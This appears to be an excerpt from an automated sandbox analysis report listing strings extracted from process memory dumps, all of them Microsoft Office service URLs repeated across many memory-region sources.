    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com3
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com32329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com35329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com37
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com38329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com42
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com51329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com55329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com58
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com59329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com62
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com63
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com67329s
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com6_
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com77329K
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com94329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com97329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.come
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.come329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.come329/
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.come329I
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.come329Q
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.come329_
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.come329m
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://officeapps.live.comhttps://microsoft.sharepoint.comhttps://shredder-us.osi.office.nethttps:/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksof
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksofbH9
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053909673.00000248C2D2C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059686410.00000248C2D2C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officepyservice.office.net/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officepyservice.office.net/service.functionalitylBias
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oloobe.officeapps.live.com/fig.AugLoopv
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/Config.Excel
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/OlsClient.svc/OlsClient
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/OlsClient.svc/OlsClientg
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/olsconfig.svc/pin/v2/%
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/olsconfig.svc/redemption/flighting/
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/olsconfig.svc/redemption/locales
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E4E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesBias
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesPX
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiessaOfficeAddInClassifierOfficeEntitiesUpdat
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E4E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated3
